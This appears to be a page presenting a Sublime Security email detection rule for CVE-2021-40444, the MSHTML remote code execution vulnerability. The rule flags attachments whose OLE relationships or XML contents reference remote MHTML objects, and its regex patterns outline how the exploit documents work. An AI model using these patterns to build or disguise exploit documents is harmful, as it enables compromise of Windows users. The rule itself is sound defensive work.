Attachment: CVE-2021-40444 - MSHTML Remote Code Execution Vulnerability
Attachment contains an external relationship that attempts to load a remote OLE object, consistent with use in CVE-2021-40444.
On September 7, 2021, Microsoft released details about a zero day RCE vulnerability in MSHTML that affects Microsoft Windows.
According to Microsoft: "we are aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine."
Sublime rule (View on GitHub)
1name: "Attachment: CVE-2021-40444 - MSHTML Remote Code Execution Vulnerability"
2description: |
3 Attachment contains an external relationship that attempts to load a remote OLE object, consistent with use in CVE-2021-40444.
4
5 On September 7, 2021, Microsoft released details about a zero day RCE vulnerability in MSHTML that affects Microsoft Windows.
6
7 According to Microsoft: "we are aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents. An attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine."
8references:
9 - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444"
10 - "https://twitter.com/buffaloverflow/status/1436261107329642522"
11 - "https://twitter.com/jroosen/status/1435792491899494402"
12 - "https://twitter.com/decalage2/status/1436433067619622916"
13 - "https://www.reddit.com/r/crowdstrike/comments/pkb9wi/situational_awareness_cve202140444_mshtml_remote/"
14 - "https://twitter.com/aaaddress1/status/1436393045939814400"
15type: "rule"
16severity: "critical"
17source: |
18 type.inbound
19 and any(attachments,
20 (
21 (
22 .file_extension in~ $file_extensions_macros
23 or .file_extension =~ "rtf"
24 or (
25 .file_extension is null
26 and .file_type == "unknown"
27 and .content_type == "application/octet-stream"
28 and .size < 100000000
29 )
30 )
31 and any(file.oletools(.).relationships, regex.icontains(.target, ".*html:http.*"))
32 )
33 or (
34 .file_extension in~ $file_extensions_common_archives
35 and any(file.explode(.),
36 .flavors.mime == "text/xml"
37 and any(.scan.strings.strings, regex.icontains(., ".*oleObject.*mhtml.*http.*"))
38 )
39 )
40 )
41tags:
42 - "CVE-2021-40444"
43attack_types:
44 - "Malware/Ransomware"
45tactics_and_techniques:
46 - "Exploit"
47 - "Macros"
48 - "Scripting"
49detection_methods:
50 - "Archive analysis"
51 - "Content analysis"
52 - "File analysis"
53 - "Macro analysis"
54 - "OLE analysis"
55id: "8cefcf7f-2a48-5102-9b09-8db995759223"